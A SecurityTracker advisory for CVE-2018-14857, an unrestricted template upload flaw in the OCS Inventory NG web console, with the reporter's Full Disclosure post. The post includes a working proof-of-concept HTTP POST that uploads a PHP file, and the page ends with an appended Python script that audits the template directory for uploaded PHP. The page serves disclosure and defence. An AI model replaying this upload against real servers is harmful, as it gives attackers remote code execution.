


Category:   Application (Generic)  >   OCS inventory NG Vendors:
OCS inventory NG Lack of Template File Upload Restrictions Lets Remote Authenticated Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1041418
SecurityTracker URL:
CVE Reference:   CVE-2018-14857   (Links to External Site)
Date:  Aug 3 2018
Impact:   Execution of arbitrary code via network, Modification of system information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in OCS inventory NG. A remote authenticated user can upload files and execute arbitrary code on the target system.

A remote authenticated user can upload a specially crafted template file containing PHP code and then cause the code to be executed on the target system. The code will run with the privileges of the target service.

Simon Uvarov reported this vulnerability.

Impact:   A remote authenticated user can upload files to the target system.

A remote authenticated user can execute arbitrary PHP code on the target system.

Solution:   The vendor has issued a source code fix, available at:

Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [FD] CVE-2018-14857 (Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5)

# Title
Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5

# Reserved CVE

# Vulnerability Overview
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.

# Discovered By
Simon Uvarov

# Vendor Status

# Vulnerability Details
The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory.

POST /ocsreports/index.php?function=notification HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2093529028912
Content-Length: 970
Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="CSRF_584"

Content-Disposition: form-data; name="onglet"

Content-Disposition: form-data; name="old_onglet"

Content-Disposition: form-data; name="notif_choice"

Content-Disposition: form-data; name="template"; filename="phpinfo.php"
Content-Type: text/html

<?php phpinfo(); ?>

Content-Disposition: form-data; name="subject"

Content-Disposition: form-data; name="RELOAD_CONF"

Content-Disposition: form-data; name="Send"



The PHP file is then accessible via

# Timeline:
2018-08-01: vuln discovered
2018-08-01: emailed vendor
2018-08-02: reply from vendor: vuln confirmed & patch is created
2018-08-03: public disclosure

# Patch:

Sent through the Full Disclosure mailing list
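
A defender-side check for the condition described above, as an added example that is not part of the advisory or the original post: it walks the template directory named in the report and flags files whose extension is not .html or whose content contains a PHP open tag. The function names and the sample files are assumptions constructed for illustration.

```python
"""Audit an OCS Inventory template directory for files that an upload
without extension checks (CVE-2018-14857) could have left behind."""
import os
import re
import tempfile

# Directory named in the advisory; pass another path if your install differs.
DEFAULT_DIR = "/usr/share/ocsinventory-reports/ocsreports/templates/"
# PHP open tags: "<?php", "<?=" and the short form "<?" (but not "<?xml").
PHP_TAG = re.compile(rb"<\?(php|=|(?!xml))", re.IGNORECASE)


def audit_templates(root=DEFAULT_DIR):
    """Return sorted (relative_path, reason) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            # Templates are expected to be .html only.
            if os.path.splitext(name)[1].lower() != ".html":
                findings.append((rel, "extension is not .html"))
            with open(path, "rb") as fh:
                if PHP_TAG.search(fh.read()):
                    findings.append((rel, "contains a PHP open tag"))
    return sorted(findings)


def build_constructed_sample(root):
    """Write constructed sample files (not real OCS templates) into root."""
    samples = {
        "notif.html": b"<html><body>Report for {{ host }}</body></html>",
        "phpinfo.php": b"<?php phpinfo(); ?>",
        "hidden.html": b"<html><?= 1 ?></html>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        for rel, reason in audit_templates(tmp):
            print(f"{rel}: {reason}")
```

Run it against the live template directory after patching to confirm nothing was left behind by an earlier upload; any finding warrants reviewing the web server access log for requests to that file.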